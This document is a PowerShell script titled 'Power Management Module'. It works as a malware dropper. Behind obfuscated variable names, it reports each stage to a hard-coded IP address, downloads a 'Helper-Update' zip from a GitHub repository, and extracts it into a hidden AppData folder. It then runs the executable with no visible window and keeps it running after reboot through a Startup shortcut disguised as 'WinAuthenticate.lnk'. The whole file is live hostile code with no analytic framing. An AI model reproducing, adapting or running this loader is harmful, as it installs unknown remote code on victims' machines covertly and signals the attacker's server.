# Power Management Module
# Execution ID: 476c624d

$HcLn45y4ZVpjn0AZ = "61pomhbidsguvzjw"
$dfM5ykfFjq = "http://45.150.34.205"

# Initialize tracking
try {
    $A7bLAuuGm = "http://45.150.34.205/3631706f6d68626964736775767a6a77/started/5da42467"
    $null = Invoke-WebRequest -Uri $A7bLAuuGm -UseBasicParsing -ErrorAction SilentlyContinue
} catch { $null }

# Create installation folder
$OvBjpSXdQG = "ZH1PZ0QVLS-4ADFDE2E-FD67-4C88-B6A3-4C6E076D3C52"
$MhN3DvVbq = New-Item -Path "$env:LOCALAPPDATA\$OvBjpSXdQG" -ItemType Directory -Force

$JyGxTyqHxpg5CZLRTX8z = "$MhN3DvVbq\hu--83689c35-c76b-46ac-b33e-7aba47b92dfa.zip"
try {
    # Download from GitHub
    $LjCfnnlUa7wP5K4MMK = "https://raw.githubusercontent.com/pourpory-sig/Helper-Update/refs/heads/main/hu--83689c35-c76b-46ac-b33e-7aba47b92dfa.zip"
    Invoke-WebRequest -Uri $LjCfnnlUa7wP5K4MMK -OutFile $JyGxTyqHxpg5CZLRTX8z -ErrorAction Stop
} catch {
    try {
        $WiJCw3763XMmMSSH3Gg = "http://45.150.34.205/3631706f6d68626964736775767a6a77/failed/ae3977a2"
        $null = Invoke-WebRequest -Uri $WiJCw3763XMmMSSH3Gg -UseBasicParsing -ErrorAction SilentlyContinue
    } catch { $null }
    exit 1
}

try {
    # Extract components
    Add-Type -AssemblyName System.IO.Compression.FileSystem -ErrorAction Stop
    [System.IO.Compression.ZipFile]::ExtractToDirectory($JyGxTyqHxpg5CZLRTX8z, $MhN3DvVbq)
    
    
} catch {
    try {
        $WiJCw3763XMmMSSH3Gg = "http://45.150.34.205/3631706f6d68626964736775767a6a77/failed/ae3977a2"
        $null = Invoke-WebRequest -Uri $WiJCw3763XMmMSSH3Gg -UseBasicParsing -ErrorAction SilentlyContinue
    } catch { $null }
    exit 1
}

# Clean up zip file
Remove-Item -Path $JyGxTyqHxpg5CZLRTX8z -Force -ErrorAction SilentlyContinue

# Execute main component from the extracted folder
$lHeeUPW6qjM0HkDNxerb = "$MhN3DvVbq\Helper-Update.exe"
if (Test-Path $lHeeUPW6qjM0HkDNxerb) {
    Start-Process -FilePath $lHeeUPW6qjM0HkDNxerb -WindowStyle Hidden -ErrorAction SilentlyContinue
    
    # Add to startup
    try {
        $XvUv6zXi1 = [Environment]::GetFolderPath('Startup')
        $FFMUaFfl9w = "$XvUv6zXi1\WinAuthenticate.lnk"
        
        $wWsx8ugATVpNA = New-Object -ComObject WScript.Shell
        $e57ScB0cg01r = $wWsx8ugATVpNA.CreateShortcut($FFMUaFfl9w)
        $e57ScB0cg01r.TargetPath = $lHeeUPW6qjM0HkDNxerb
        $e57ScB0cg01r.WindowStyle = 7
        $e57ScB0cg01r.Save()
        
        # Start again to ensure it's running
        Start-Process -FilePath $lHeeUPW6qjM0HkDNxerb -WindowStyle Hidden
    } catch { $null }
} else {
    # If exe not found in subfolder, check root
    $lHeeUPW6qjM0HkDNxerb = "$MhN3DvVbq\Helper-Update.exe"
    if (Test-Path $lHeeUPW6qjM0HkDNxerb) {
        Start-Process -FilePath $lHeeUPW6qjM0HkDNxerb -WindowStyle Hidden -ErrorAction SilentlyContinue
        
        try {
            $XvUv6zXi1 = [Environment]::GetFolderPath('Startup')
            $FFMUaFfl9w = "$XvUv6zXi1\WinAuthenticate.lnk"
            
            $wWsx8ugATVpNA = New-Object -ComObject WScript.Shell
            $e57ScB0cg01r = $wWsx8ugATVpNA.CreateShortcut($FFMUaFfl9w)
            $e57ScB0cg01r.TargetPath = $lHeeUPW6qjM0HkDNxerb
            $e57ScB0cg01r.WindowStyle = 7
            $e57ScB0cg01r.Save()
            
            Start-Process -FilePath $lHeeUPW6qjM0HkDNxerb -WindowStyle Hidden
        } catch { $null }
    }
}

# Send completion signal
try {
    $gUzpaka1XjWTFxzQ4qz = "http://45.150.34.205/3631706f6d68626964736775767a6a77/completed/31dd31ee"
    $null = Invoke-WebRequest -Uri $gUzpaka1XjWTFxzQ4qz -UseBasicParsing -ErrorAction SilentlyContinue
} catch { $null }